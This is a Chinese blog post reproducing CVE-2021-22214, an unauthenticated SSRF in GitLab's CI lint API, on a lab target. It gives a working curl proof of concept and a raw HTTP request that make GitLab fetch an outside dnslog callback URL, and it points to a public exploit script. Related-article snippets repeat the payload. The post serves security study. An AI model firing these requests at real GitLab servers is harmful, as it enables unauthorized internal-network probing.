gitlab SSRF(CVE-2021-22214)

最新推荐文章于 2024-06-06 21:05:22 发布
最新推荐文章于 2024-06-06 21:05:22 发布
阅读量1.8k 收藏 4
点赞数 1
分类专栏: 漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/YouthBelief/article/details/121269595
版权

gitlab SSRF CVE-2021-22214


所有文章,仅供安全研究与学习之用,后果自负!

gitlab SSRF(CVE-2021-22214)

0x01 漏洞描述

GitLab存在前台未授权SSRF漏洞。该漏洞源于对用户提供数据的验证不足,远程攻击者可通过发送特殊构造的 HTTP 请求,欺骗应用程序向任意系统发起请求。攻击者成功利用该漏洞可获得敏感数据的访问权限或向其他服务器发送恶意请求。

0x02 影响范围

13.10.5 > GitLab >= 10.5
13.11.5 > GitLab >= 13.11
13.12.2 > GitLab >= 13.12

0x03 漏洞复现

(1)访问靶场
http://vulfocus.fofa.so:27138/
在这里插入图片描述

curl检测

curl -k -s --show-error -H 'Content-Type: application/json' http://攻击ip:端口/api/v4/ci/lint --data '{ "include_merged_yaml": true, "content":"include:\n remote: http://dnslog地址/api/v1/targets/?test.yml"}'

在这里插入图片描述

ssrf执行成功在这里插入图片描述

bp 数据包检测

POST /api/v4/ci/lint HTTP/1.1
Host: 192.168.8.230:36586
User-Agent: python-requests/2.25.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Type: application/json
Content-Length: 111

{"include_merged_yaml": true, "content": "include:\n  remote: http://4ggwkl.dnslog.cn/api/v1/targets?test.yml"}

在这里插入图片描述

脚本检测

(3)使用脚本 复现漏洞

https://github.com/r0ckysec/CVE-2021-22214

尝试访问dnslog

python gitlab_ssrf.py http://vulfocus.fofa.so:27138/ dnslog地址

在这里插入图片描述
有访问记录 说明存在漏洞
在这里插入图片描述

0x04 漏洞修复

升级至最新版本

LuckyCharm~
关注
专栏目录
Gitlab SSRF 漏洞复现 CVE-2021-22214
afei001
08-03 1240
GitLab 是一个用于仓库管理系统的开源项目,使用 Git 作为代码管理工具,并在此基础上搭建起来的 Web服务。当对内部网络的webhook的请求被启用时,GitLab CE/EE中一个服务器端请求伪造漏洞SSRF(影响从10.5开始的所有版本)就有可能被未经身份验证的攻击者利用,即使是在注册受限的GitLab实例上。...
追洞计划 | Gitlab CI Lint API未授权 SSRF漏洞(CVE-2021-22214)
Ms08067安全实验室
06-22 6152
文章来源|MS08067 Web安全知识星球本文作者:Taoing(Web安全攻防合伙人) GitLab 是一个用于仓库管理系统的开源项目,使用Git作为代码管理工具,并在此基础上搭建起来...
Gitlab SSRF(CVE-2021-22214)
m0_65150886的博客
02-02 360
当13.10.5 > GitLab >= 10.5、13.11.5 > GitLab >= 13.11、13.12.2 > GitLab >= 13.12时,远程攻击者可通过发送特殊构造的 HTTP 请求,欺骗应用程序向任意系统发起请求。而根据其说明文档文档,其include操作支持remote选项,用于获取远端的yaml。GitLab是美国GitLab公司的一款使用Ruby on Rails开发的、自托管的Git(版本控制系统)项目仓库应用程序。该程序可用于查阅项目的文件内容、提交历史、Bug列表等。
CVE-2021-22214 Gitlab_SSRF
weixin_45945976的博客
12-15 2739
CVE-2021-22214 Gitlab_SSRF 漏洞复现: 目标地址:https://gitlab.xxx.xxx/users/sign_in POC curl -s --show-error -H 'Content-Type: application/json' https://gitlab.xxx.xxx/api/v4/ci/lint --data '{ "include_merged_yaml": true, "content": "include:\n remote: http://fbnw
[CVE-2021-22214]Gitlab SSRF 未授权访问漏洞
whoami
04-13 3376
一、影响版本 13.10.5 > GitLab >= 10.5 13.11.5 > GitLab >= 13.11 13.12.2 > GitLab >= 13.12 二、漏洞POC curl -s --show-error -H 'Content-Type: application/json' http://127.0.0.1:55001/api/v4/ci/lint --data '{ "include_merged_yaml": true, "con
(CVE-2021-22214)Gitlab SSRF漏洞 漏洞复现
鸣蜩十四的博客
08-09 2659
简介 GitLab 是一个用于仓库管理系统的开源项目,使用Git作为代码管理工具,并在此基础上搭建起来的Web服务。 漏洞描述 GitLab是美国GitLab公司的一款使用Ruby on Rails开发的、自托管的、Git(版本控制系统)项目仓库应用程序。该程序可用于查阅项目的文件内容、提交历史、Bug列表等。Gitlab的CI lint API用于验证提供给gitlab ci的配置文件是否是yaml格式。而根据其说明文档文档,其include 操作支持remote选项,用于获取远端的yaml。因此在此处将
GitLab SSRF
若把此心以学道,即身成佛有何难
06-22 611
只要春天不死,就有迎春的花朵年年岁岁开放,生命讲涅磐,生生不息,并会以另一种形式永存。
生命在于研究——CVE-2021-22214记录
易水哲的博客
09-28 468
GitLab存在前台未授权SSRF漏洞,未授权的攻击者也可以利用该漏洞执行SSRF攻击(CVE-2021-22214)。该漏洞源于对用户提供数据的验证不足,远程攻击者可通过发送特殊构造的 HTTP 请求,欺骗应用程序向任意系统发起请求。攻击者成功利用该漏洞可获得敏感数据的访问权限或向其他服务器发送恶意请求。
Python-GitLab1147SSRF配合redis远程执行代码
08-10
GitLab 11.4.7 SSRF配合redis远程执行代码
CVE-2021-22214
08-09
CVE-2021-22214是一个与GitLab相关的SSRF漏洞。该漏洞允许攻击者通过构造特定的请求,在GitLab中实现服务器端请求伪造。通过发送恶意的请求,攻击者可以执行未经授权的操作,可能导致敏感信息泄露或系统受到攻击。 ...
GitLab任意文件读取漏洞(CVE-2020-10977)POC
01-15
检测脚本
案例研究-SSRF+DNS rebinding【$5000】
最新发布
the_biggest_baby的博客
06-06 1080
分享一篇 HackerOne 上一篇赏金 5000$ 的 DNS rebinding(重新绑定)绕过 ssrf 的报告的学习记录。Hacking for fun!
Log4j2漏洞复现(CVE-2021-44228)
热门推荐
qq_43798640的博客
12-15 3万+
Apache Log4j是一个基于Java的日志记录组件,通过重写Log4j引入了丰富的功能特性,该日志组件被广泛应用于业务系统开发,用以记录程序输入输出日志信息。Apache Log4j2存在远程代码执行漏洞,攻击者可利用该漏洞向目标服务器发送精心构造的恶意数据,触发Log4j2组件解析缺陷,实现目标服务器的任意代码执行,获得目标服务器权限。影响范围:Apache Log4j 2.x<=2.14.1。已知受影响的应用及组件,如 spring-boot-strater-log4...
Gitlab 任意文件读取漏洞(CVE-2016-9086)以及gitlab SSRF to redis
公众号shadow sock7
12-16 1222
使用vulhub的环境: https://github.com/vulhub/vulhub/tree/master/gitlab/CVE-2016-9086 任意文件读取漏洞(CVE-2016-9086): GitLab CE/EEversions 8.9, 8.10, 8.11, 8.12, and 8.13 任意用户authentication_token泄露漏洞: Gitlab CE/EE versions 8.10.3-8.10.5 docker起来之后是这样: 新建项目的时候有一个从Gitl
聊聊近期公开的几个GitLab高额奖金漏洞
漏洞战争
10-20 736
最近HackerOne上公开了几个GitLab的漏洞,奖金还不低,一些漏洞细节也已经公开,大多是业务逻辑漏洞,学习下。漏洞一:issue迁移导致跨目录读取任意文件【漏洞利用过程】1、创建...
利用Vulnhub复现漏洞 - Gitlab 任意文件读取漏洞(CVE-2016-9086)
JiangBuLiu的博客
07-08 3335
Gitlab 任意文件读取漏洞(CVE-2016-9086)Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现 Vulnhub官方复现教程 https://vulhub.org/#/environments/gitlab/CVE-2016-9086/ 漏洞原理 Gitlab版本:8.13.1 原理剖析:http://paper.seebug.org/104/ 复现漏洞 启动环境 https...
ssrf漏洞内网渗透_只用个低危SSRF提权就能进内网
weixin_39635373的博客
12-09 620
**Github地址:https://github.com/r35tart/PenetrationTestingCase-----------------------------------------------------漏洞详情:**低危SSRF漏洞漏洞域名:http://xxxxxxxxx.*.com打开后自动跳转至:http://xxxxxxx.*.com/Public/login且状态...
【POC公开】CVE-2021-31166:Windows HTTP协议远程代码执行漏洞通告
爱国小白帽
05-17 2539
报告编号:B6-2021-051702 报告来源:360CERT 报告作者:360CERT 更新日期:2021-05-17 1 漏洞简述 2021年05月17日,360CERT监测发现国外安全研究员发布了Windows HTTP协议远程代码执行漏洞的POC详情,漏洞编号为CVE-2021-31166,漏洞等级:严重,漏洞评分:9.8。 该漏洞在微软5月补丁日中完成了修复,微软官方将其标记为可造成蠕虫攻击及易被攻击,攻击者可以利用该漏洞造成大范围蠕虫攻击。 对此,360CERT建议广大用户及时将Windows
WebLogic CVE-2021-2211 XXE漏洞分析
爱国小白帽
04-21 1240
漏洞简述 2021年1月12日,墨云安全V-Lab实验室向Oracle官方报告了Weblogic Server XXE漏洞,2021年4月21日Oracle发布了致谢信息。 时间线 2021年1月12日向Oracle官方报告了此漏洞 2021年1月13日Oracle分配了issue编号 2021年1月25日Oracle确认在下一个补丁日修复此漏洞 2021年4月17日Oracle分配CVE编号CVE-2021-2211 2021年4月21日Oracle发布致谢信息 影响版本 10.3.6.0.0 1.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值